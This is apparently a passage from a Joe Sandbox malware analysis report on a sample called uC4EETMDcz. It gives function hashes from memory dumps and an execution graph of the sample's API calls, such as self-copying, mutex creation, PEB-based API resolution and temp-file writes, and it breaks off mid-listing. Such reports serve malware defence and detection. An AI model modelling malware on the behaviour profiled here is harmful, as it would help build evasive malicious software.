                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d1aa0730d3acd263c0c1a496ecfe1cefcbdebd12d6e7d3a24afb69e77b1e3ab
                                              • Instruction ID: 1c6701f65a73fceb5084f194cc04aa6b1d6a55d2a571f07947ea9c6e71d338a3
                                              • Opcode Fuzzy Hash: 7d1aa0730d3acd263c0c1a496ecfe1cefcbdebd12d6e7d3a24afb69e77b1e3ab
                                              • Instruction Fuzzy Hash: 42B1F670E04218CFDB24DFAAD994BADBBF2FB89304F109069D909A7345DB745986DF08
                                              Function 05719840 Relevance: .2, Instructions: 248COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 734ac27f598ea18b3d7eb59c414db028cb53a93cbd4268f8a43fac96b18f4413
                                              • Instruction ID: 69a8ff57658f6cae1ab5531a07687c637a27ea17219f1882cdd680d6d7052a70
                                              • Opcode Fuzzy Hash: 734ac27f598ea18b3d7eb59c414db028cb53a93cbd4268f8a43fac96b18f4413
                                              • Instruction Fuzzy Hash: D8B11770E00218CFDB14DFAAD994BADBBF2FB89304F1480A9D909A7345DB745986DF08
                                              Function 00F8A650 Relevance: .2, Instructions: 245COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f018f4d648b950aab902748017fdeeaae5758122aefcf25f140210dbc172aa0
                                              • Instruction ID: 6b140b1035785d34e654661124c9745bc1c3f96ad9ab78aef7839e16bcbbf3b9
                                              • Opcode Fuzzy Hash: 4f018f4d648b950aab902748017fdeeaae5758122aefcf25f140210dbc172aa0
                                              • Instruction Fuzzy Hash: 2AC19575E016188FDB58DF6AC944ADDBBF2AF89300F14C1AAD909AB365DB305E81CF50
                                              Function 051AE903 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7330a0d396ccea81869499c2252ea3d3df0f06350ac8cb1de74d93435fdd1d20
                                              • Instruction ID: 6a113e92ae48850d414ce7eccd182210bc2aa6382e1ddca1c8bf94ee574b5b16
                                              • Opcode Fuzzy Hash: 7330a0d396ccea81869499c2252ea3d3df0f06350ac8cb1de74d93435fdd1d20
                                              • Instruction Fuzzy Hash: B3A13B78E05218CFDB25DFA9C948BAEBBF6FF89300F1082A9D409A7255DB745985CF01
                                              Function 056E34D0 Relevance: .2, Instructions: 214COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e8400e92c4ed032bf6042a97756e2ccaa52989f50530e915c278e06be4ec7a2
                                              • Instruction ID: 5d1f1bec762864cc6afdfb6eaef38ef8640f3133c5619fab4886dc8f015d8a08
                                              • Opcode Fuzzy Hash: 8e8400e92c4ed032bf6042a97756e2ccaa52989f50530e915c278e06be4ec7a2
                                              • Instruction Fuzzy Hash: 0C913974A06218CFDB14DFA9E988BAEBBF2FB49300F105569D40AA7345DB746986CF04
                                              Function 056E34E0 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0c9fb4f8e494b737592e763447b01b5543374688cddd07cebceacd231512c7d
                                              • Instruction ID: 67b73697e95c803fbdd5be703f201a3daa07eed46fdb5a2572a22891c9e6a2f8
                                              • Opcode Fuzzy Hash: d0c9fb4f8e494b737592e763447b01b5543374688cddd07cebceacd231512c7d
                                              • Instruction Fuzzy Hash: 08811970A06218CFDB14DFA9E988BAEB7F6FB4A300F105569D40AA7345DB746986CF04
                                              Function 0582E1A0 Relevance: .2, Instructions: 205COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 570167dd901333f961f57868a3bbae8490aac8bdbab80b9a7adf605f5e42500d
                                              • Instruction ID: da07b23cf3078983951ef682a5a67c6b0affd91f3d4124bee15ca9b78f47a980
                                              • Opcode Fuzzy Hash: 570167dd901333f961f57868a3bbae8490aac8bdbab80b9a7adf605f5e42500d
                                              • Instruction Fuzzy Hash: C181F870D0522CCFEB24DF66C844BADBBBABF49305F5490AAD809AB250DB745E85CF05
                                              Function 056E3630 Relevance: .2, Instructions: 203COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1acc359987da8b044742a2144c88c7120f173d769a4a76880958c778686025b
                                              • Instruction ID: ce0d926ea21895234482051d063ff1e0a73f7d159d17bb0500172d1f2e4604b1
                                              • Opcode Fuzzy Hash: c1acc359987da8b044742a2144c88c7120f173d769a4a76880958c778686025b
                                              • Instruction Fuzzy Hash: 5F810C70E06218CFDB14DFA9D988BAEB7F2FB4A300F509569D40AA7355DB746982CF04
                                              Function 00F86859 Relevance: .2, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 742426f734d6823b53799f061a9e6ab8e44a2ebd3e39c99705c65155ff7b2029
                                              • Instruction ID: 859ac07703f66e9c1c93e9644c46779ad4698a2e43d78d87e8346b1e34a67083
                                              • Opcode Fuzzy Hash: 742426f734d6823b53799f061a9e6ab8e44a2ebd3e39c99705c65155ff7b2029
                                              • Instruction Fuzzy Hash: 5271FB71A05209CFD708EFABE88069ABBF3FFC8310F14C529D0049B265DBB45946DB90
                                              Function 00F86868 Relevance: .2, Instructions: 165COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 589d9406a70e83c0905c134abab51ddac034d9a519055a7c5edcc930be163dee
                                              • Instruction ID: 2323ea0174b1666b8b34310962f4bfb9ade1d44620a5242265416ad06d14baf0
                                              • Opcode Fuzzy Hash: 589d9406a70e83c0905c134abab51ddac034d9a519055a7c5edcc930be163dee
                                              • Instruction Fuzzy Hash: 82710C71E05209CFD708EFABE88069ABBF3FFC8310F14C529D0049B265EBB459469B90
                                              Function 051AC978 Relevance: .1, Instructions: 140COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8afb01972dbb349651b91e02b5753d8352f6c540366d07b70bf63c30c80c2cde
                                              • Instruction ID: 44658e34a5e7e893bad80f0c7eed2a87e53657977832b8c9eae1017de9a7edff
                                              • Opcode Fuzzy Hash: 8afb01972dbb349651b91e02b5753d8352f6c540366d07b70bf63c30c80c2cde
                                              • Instruction Fuzzy Hash: 6C512479905208CFDB15DFA9D488BEDBBF2FB49308F10502AE00AA7244D7B85D86CF84
                                              Function 051AC988 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5603645c8500c80764bee98f358927b5b5a487c0739d661a264f7a9696ec7bb1
                                              • Instruction ID: 561c5096222db3a5963c0b6c034a49f3e12a60bac66361f79c6fd567cfb8fe58
                                              • Opcode Fuzzy Hash: 5603645c8500c80764bee98f358927b5b5a487c0739d661a264f7a9696ec7bb1
                                              • Instruction Fuzzy Hash: 59510379909208CFDB15DFA9D488BEDBBF6FB4A308F10502AE40AA7254D7B45D85CF84
                                              Function 05570006 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c19d0b5fff0764014bd87f1ffd3df16a34b50bfafcd96598de0e3260574d2d40
                                              • Instruction ID: aabab71daec495fa535f4f0d85938fc023c04dcbf76a4a2f82cc85c9303a0e6e
                                              • Opcode Fuzzy Hash: c19d0b5fff0764014bd87f1ffd3df16a34b50bfafcd96598de0e3260574d2d40
                                              • Instruction Fuzzy Hash: 74516B71D056588BE728CF2B9D546CAFBF3AFC9300F04C1FA944CAA265EA7409868F51
                                              Function 04F99C10 Relevance: .1, Instructions: 125COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f626a98bb4585a288ace57a28cab130fd65d848f5d714dac18054de1e267d276
                                              • Instruction ID: fb190d728b7e962bc93ff96a7d83138e2d4178c82b2d2ddde3dd7cb6d6071462
                                              • Opcode Fuzzy Hash: f626a98bb4585a288ace57a28cab130fd65d848f5d714dac18054de1e267d276
                                              • Instruction Fuzzy Hash: 6E4148B1E006198BEB08CFABD94069EFBF3AFC8310F14C17AD958AB254DA7459468F54
                                              Function 05570040 Relevance: .1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c75520571f8ac10e1c51836c5ead928b9e29ee2277dc8b33b705d13bf4a359bc
                                              • Instruction ID: 1b63b184d97b718e34c42c619b1ff4b3133efcf04e79cc4f43860f1f0cd8ee90
                                              • Opcode Fuzzy Hash: c75520571f8ac10e1c51836c5ead928b9e29ee2277dc8b33b705d13bf4a359bc
                                              • Instruction Fuzzy Hash: E9511D71D05A588BEB2CCF2B9D446DAFAF7AFC9300F04C1FA944CA6264DB744A858F51
                                              Function 0557D778 Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18f2894ae97316440907e825545175e40ce3b3b80211eb19e2211741e392a844
                                              • Instruction ID: 83c12c2d13038b696cd8dfc97e4c531fe95d38910c55c4342a37707f92f7cc64
                                              • Opcode Fuzzy Hash: 18f2894ae97316440907e825545175e40ce3b3b80211eb19e2211741e392a844
                                              • Instruction Fuzzy Hash: B541DCB0D0424C9FDB14CFA9E984AADBBF1BF09310F20912AE819AB250D7749845CF95
                                              Function 05710007 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 072c692ea83e5ac9462f8847706a4f95122efd22221d4373935fae7041989cfa
                                              • Instruction ID: 212fbaa33e9761947f58efb0610b58ef227429f79314c5552e9b26288f8bd173
                                              • Opcode Fuzzy Hash: 072c692ea83e5ac9462f8847706a4f95122efd22221d4373935fae7041989cfa
                                              • Instruction Fuzzy Hash: 5B417371E05B548FE71DCF6B8D4029AFBF3AFC9211F19C0B68448AA225EA3409869F15
                                              Function 05810007 Relevance: .1, Instructions: 77COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6247e8aeafdaa035a1c3e72f048150bd572aa62d1dabadc1dfe2ed71a055f5e8
                                              • Instruction ID: 20cc384679977953a19f5180ce9738db11326bb0505fe2da0dd5f1831acfae80
                                              • Opcode Fuzzy Hash: 6247e8aeafdaa035a1c3e72f048150bd572aa62d1dabadc1dfe2ed71a055f5e8
                                              • Instruction Fuzzy Hash: C8312171D087588FD729CF6B8C45299BBF7AF85200F15C0FED848A6255EB740A85CF11
                                              Function 05810040 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 257f70d08462d3c513b83029611a6ca1231c1e18f80645cdbb3477008efc0c1b
                                              • Instruction ID: 8b1a3bdb75f8ba757eda45901cfa76fba048185bfe3cd4ac1c03dfcc80560e38
                                              • Opcode Fuzzy Hash: 257f70d08462d3c513b83029611a6ca1231c1e18f80645cdbb3477008efc0c1b
                                              • Instruction Fuzzy Hash: 8F31EE71D04619CBEB28CF67CC48699FAF7BF89300F14C0BA991CA6255EB341A81CF15
                                              Function 04F93B32 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7ef6082e9df8865c5c586d5d544cf3837827e194d47e02145ebae89cc08d0f53
                                              • Instruction ID: 9af99f7626ae8ec8ea759146407bc1074e29ad410bc58bd67bf68818122da9d8
                                              • Opcode Fuzzy Hash: 7ef6082e9df8865c5c586d5d544cf3837827e194d47e02145ebae89cc08d0f53
                                              • Instruction Fuzzy Hash: 83317171E146188BEB1DCF5B8C0068AF6FBAFC9300F04C1B9954CAA254DB741A829F04
                                              Function 04F916EF Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88635c782fad1101cbedc59f1d6c1bf59e6f61690c86163c55cf38e79de3f487
                                              • Instruction ID: 043950b72d2e7cb8217eac564f01f3e728551f1b909842f01abe3a0480106546
                                              • Opcode Fuzzy Hash: 88635c782fad1101cbedc59f1d6c1bf59e6f61690c86163c55cf38e79de3f487
                                              • Instruction Fuzzy Hash: 9A21EE72E046588BEB18CF6BDD402DEBBF7AFC9300F04C1BAD408AA214DB7419468F51
                                              Function 056F5A01 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ecfcf03b80c201f922e7b442fed89df645af8f4b3e82ab1b00c19fc1fdf791f
                                              • Instruction ID: fe88ef1980772a77ea9a7564ac11f42d8212b7d7235ff14c4831e389f3b44980
                                              • Opcode Fuzzy Hash: 9ecfcf03b80c201f922e7b442fed89df645af8f4b3e82ab1b00c19fc1fdf791f
                                              • Instruction Fuzzy Hash: 3021EDB5C04218DFDB14CFA9D984AEEFBF0BB49320F14905AE909B7210CB75A915CFA4
                                              Function 04F91700 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c43d1b04d74f6e98fe9c3a2327df1d18df3839f26e47d5a7ba1db826c0d48c84
                                              • Instruction ID: 2624fda1f99fad9a1085d2f2b30fcbd99daec749dae1d4ed0408a610e9962b78
                                              • Opcode Fuzzy Hash: c43d1b04d74f6e98fe9c3a2327df1d18df3839f26e47d5a7ba1db826c0d48c84
                                              • Instruction Fuzzy Hash: 0721A971E046199BEB18CFABDD402DEBBF7AFC9310F04C1BA9809AA214DB7419469E41
                                              Function 056F5A08 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c38e53a75dc0ee7d60421c14c4447607efeb7a13752dbb7bab0ecaba5ce542fd
                                              • Instruction ID: f97ef7cde4d069b31103374f9c5cca743f3f518206ddd21d518b97efefe82945
                                              • Opcode Fuzzy Hash: c38e53a75dc0ee7d60421c14c4447607efeb7a13752dbb7bab0ecaba5ce542fd
                                              • Instruction Fuzzy Hash: EA21FEB5C04218DFDB10CFA9D984AEEFBF0BB49320F14901AE909B7200CB75A915CFA4
                                              Function 00F86DE8 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4868a11f649e3e6670f316b38c0983faee570da05b7085cf49ab5dbadc132edb
                                              • Instruction ID: 181468fd24c77412eec44791a2e1c313b64a7d1e5d12cc8c7c11a12338d7e8a1
                                              • Opcode Fuzzy Hash: 4868a11f649e3e6670f316b38c0983faee570da05b7085cf49ab5dbadc132edb
                                              • Instruction Fuzzy Hash: 752175B1D016588BEB58CF9BC95878EFBF7BFC8304F14C1AAD408A6264DB740A859F10
                                              Function 056E4FD4 Relevance: .1, Instructions: 61COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d537e2c57b462b8946292753243ddd71d01645795bbf9c156e346281698f919b
                                              • Instruction ID: 165933fc02d07a93c0bffc9f82ae8c2346141b42f6eb37d95b8bd7a4c8b1211f
                                              • Opcode Fuzzy Hash: d537e2c57b462b8946292753243ddd71d01645795bbf9c156e346281698f919b
                                              • Instruction Fuzzy Hash: F621F774A06218CFCB10EFA5E484BADBBB2FB8A315F5091A5D50AA3254DB749986CF04
                                              Function 056F5AD8 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bd82a1a24a57d1ad583b356a7c92db8c250132b1aaabf40cde811e24658a72d
                                              • Instruction ID: 827f3265aeea7580c2d54967ca19d9baff4a38cb2b8f3fe6fc09e0f1bd7d0dbd
                                              • Opcode Fuzzy Hash: 2bd82a1a24a57d1ad583b356a7c92db8c250132b1aaabf40cde811e24658a72d
                                              • Instruction Fuzzy Hash: D901F532D142888FDB00EB94ED847EDBBF0FF55324F18455AC51AA76A2CB345C15CB65

                                              Execution Graph

                                              Execution Coverage:26.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:29.8%
                                              Total number of Nodes:255
                                              Total number of Limit Nodes:4
                                              execution_graph 961 401000 962 40104d CreateThread SetUnhandledExceptionFilter GetModuleFileNameW 961->962 966 401015 961->966 1010 401bab 962->1010 1165 40150c 962->1165 964 401097 965 4010c0 964->965 969 401288 964->969 1024 401ae1 965->1024 966->962 968 4010cc 970 401ae1 4 API calls 968->970 971 402e87 2 API calls 969->971 972 4010d8 EnumWindows 970->972 973 401297 971->973 1038 402c3b 972->1038 1160 40177f GetWindowThreadProcessId GetCurrentProcessId 972->1160 975 402f5b 2 API calls 973->975 977 4012a2 975->977 976 4010f2 GetEnvironmentVariableW 984 401116 976->984 978 4012b7 CreateMutexW 977->978 979 402e87 2 API calls 978->979 980 4012d4 979->980 981 402f5b 2 API calls 980->981 982 4012df 981->982 986 403271 ExitProcess 982->986 987 4012e9 982->987 983 401123 985 401155 CreateDirectoryW 983->985 984->983 988 40122e 984->988 995 401175 985->995 989 402e87 2 API calls 987->989 990 401233 CopyFileW 988->990 994 40124e 988->994 991 4012ff 989->991 990->988 992 401253 990->992 993 402f5b 2 API calls 991->993 1040 401806 992->1040 1008 40130a 993->1008 994->983 998 401187 CopyFileW 995->998 997 401267 1060 402e87 997->1060 998->992 1003 402f5b GetPEB LdrLoadDll 1003->1008 1005 402e87 GetPEB LdrLoadDll 1005->1008 1007 402966 GetPEB LdrLoadDll 1007->1008 1008->1003 1008->1005 1008->1007 1072 4029a9 1008->1072 1087 4028d1 1008->1087 1100 402025 CreateEventA VirtualAlloc 1008->1100 1011 402e87 2 API calls 1010->1011 1012 401bca 1011->1012 1013 402f5b 2 API calls 1012->1013 1014 401bd5 CoInitialize 1013->1014 1015 401bea 1014->1015 1016 402e87 2 API calls 1015->1016 1017 401c1d 1016->1017 1018 402f5b 2 API calls 1017->1018 1022 401c28 1018->1022 1019 402e87 2 API calls 1020 401ca8 1019->1020 1021 402f5b 2 API calls 1020->1021 1023 401cb3 CoUninitialize 1021->1023 1022->1019 1023->964 1025 402e87 2 API calls 1024->1025 1026 401af9 1025->1026 1027 402f5b 2 API calls 1026->1027 1028 401b04 CoInitialize 1027->1028 1029 401b19 1028->1029 1030 402e87 2 API calls 1029->1030 1031 401b4c 1030->1031 1032 402f5b 2 API calls 1031->1032 1033 401b57 1032->1033 1034 402e87 2 API calls 1033->1034 1035 401b97 1034->1035 1036 402f5b 2 API calls 1035->1036 1037 401ba2 CoUninitialize 1036->1037 1037->968 1039 402c48 1038->1039 1039->976 1041 402e87 2 API calls 1040->1041 1042 40181e 1041->1042 1043 402f5b 2 API calls 1042->1043 1044 401829 CoInitialize 1043->1044 1045 40183e 1044->1045 1046 402e87 2 API calls 1045->1046 1047 401871 1046->1047 1048 402f5b 2 API calls 1047->1048 1049 40187c 1048->1049 1054 402e87 2 API calls 1049->1054 1059 4019c0 1049->1059 1050 402e87 2 API calls 1051 401acd 1050->1051 1052 402f5b 2 API calls 1051->1052 1053 401ad8 CoUninitialize 1052->1053 1053->997 1055 40190e 1054->1055 1056 402f5b 2 API calls 1055->1056 1057 401919 1056->1057 1058 401993 GetSystemTime 1057->1058 1057->1059 1058->1059 1059->1050 1061 402c3b 1060->1061 1062 402ea4 GetPEB 1061->1062 1064 402eb9 1062->1064 1063 401276 1066 402f5b 1063->1066 1064->1063 1065 402f47 LdrLoadDll 1064->1065 1065->1063 1068 402f78 1066->1068 1067 401281 Sleep 1067->986 1068->1067 1069 402e87 2 API calls 1068->1069 1070 403036 1069->1070 1071 402f5b 2 API calls 1070->1071 1071->1067 1073 4029bd 1072->1073 1074 402af0 1073->1074 1080 4029d6 1073->1080 1075 402e87 2 API calls 1074->1075 1076 402b26 1075->1076 1077 402f5b 2 API calls 1076->1077 1086 402ad1 1077->1086 1078 4029a9 2 API calls 1078->1080 1079 402e87 GetPEB LdrLoadDll 1079->1080 1080->1078 1080->1079 1081 402f5b GetPEB LdrLoadDll 1080->1081 1082 402aa8 1080->1082 1081->1080 1083 402e87 2 API calls 1082->1083 1084 402ac6 1083->1084 1085 402f5b 2 API calls 1084->1085 1085->1086 1086->1008 1088 4028e7 1087->1088 1096 402901 1087->1096 1089 402e87 2 API calls 1088->1089 1090 4028f6 1089->1090 1092 402f5b 2 API calls 1090->1092 1091 40293c 1094 40295a 1091->1094 1095 402e87 2 API calls 1091->1095 1092->1096 1093 402e87 2 API calls 1093->1096 1094->1008 1097 40294f 1095->1097 1096->1091 1096->1093 1098 402f5b 2 API calls 1096->1098 1099 402f5b 2 API calls 1097->1099 1098->1096 1099->1094 1102 402064 1100->1102 1101 4029a9 2 API calls 1101->1102 1102->1101 1104 4028a0 ResetEvent CloseHandle VirtualFree 1102->1104 1105 4027b0 VirtualAlloc 1102->1105 1106 4028d1 GetPEB LdrLoadDll 1102->1106 1107 402f5b GetPEB LdrLoadDll 1102->1107 1108 40281e CreateThread 1102->1108 1109 402e87 GetPEB LdrLoadDll 1102->1109 1110 402625 VirtualAlloc 1102->1110 1111 4028d1 2 API calls 1102->1111 1121 402966 1102->1121 1104->1008 1105->1102 1106->1102 1107->1102 1108->1102 1130 401cbf 1108->1130 1109->1102 1110->1102 1112 4026e2 GetTempPathA 1111->1112 1114 4026f3 1112->1114 1115 401806 5 API calls 1114->1115 1118 40304e CreateFileA 1114->1118 1116 40278a Sleep 1115->1116 1117 401ae1 4 API calls 1116->1117 1117->1102 1119 4030a5 1118->1119 1120 40307a SetFilePointer WriteFile CloseHandle 1118->1120 1119->1114 1120->1119 1122 402e87 2 API calls 1121->1122 1123 40297b 1122->1123 1124 402f5b 2 API calls 1123->1124 1125 402986 1124->1125 1126 402e87 2 API calls 1125->1126 1127 402995 1126->1127 1128 402f5b 2 API calls 1127->1128 